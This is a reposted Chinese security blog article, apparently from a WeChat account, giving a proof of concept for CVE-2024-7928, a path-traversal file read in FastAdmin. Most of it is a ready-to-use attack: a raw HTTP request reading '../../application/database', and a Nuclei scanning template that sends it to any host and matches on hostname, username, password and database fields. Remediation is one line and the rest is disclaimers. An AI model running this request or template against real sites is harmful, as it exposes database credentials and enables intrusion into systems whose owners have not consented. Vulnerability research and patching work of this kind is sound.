FastAdmin 任意文件读取漏洞(CVE-2024-7928)PoC

admin 2024年10月3日15:29:52评论544 views字数 1616阅读5分23秒阅读模式
声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。

0X01 简介

FastAdmin基于ThinkPHP强大的命令行功能扩展了一系列命令行功能,可以很方便的一键生成CRUD、生成权限菜单、压缩打包CSS和JS、启用禁用插件等功能。
漏洞编号:
CVE-2024-7928
影响范围:
FastAdmin  < 1.3.4.20220530
复现环境:
FastAdmin 1.0.0.20181031

0X02 漏洞复现

POC:
GET /index/ajax/lang?lang=../../application/database HTTP/1.1Host: 192.168.31.133Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: keep-alive
FastAdmin 任意文件读取漏洞(CVE-2024-7928)PoC
Nuclei:
id: FastAdmin-renyiwenjianduqu-CVE-2024-7928info:  name: FastAdmin 任意文件读取漏洞-CVE-2024-7928  author: 紫色皓月  severity: high  description: FastAdmin 任意文件读取漏洞  tags: CVE-2024-7928,2024,FastAdmin,任意文件读取requests:  - raw:    - |      GET /index/ajax/lang?lang=../../application/database HTTP/1.1      Host: {{Hostname}}      Cache-Control: max-age=0      Upgrade-Insecure-Requests: 1      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7      Accept-Encoding: gzip, deflate, br      Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6      Connection: keep-alive    req-condition: true    matchers:      - type: word        words:          - 'hostname'          - 'username'          - 'password'          - 'database'        condition: and
FastAdmin 任意文件读取漏洞(CVE-2024-7928)PoC

0X03 修复建议

升级至安全版本!

0X04

原文始发于微信公众号(皓月的笔记本):【漏洞复现】FastAdmin 任意文件读取漏洞(CVE-2024-7928)

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月3日15:29:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   FastAdmin 任意文件读取漏洞(CVE-2024-7928)PoChttps://cn-sec.com/archives/3228833.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息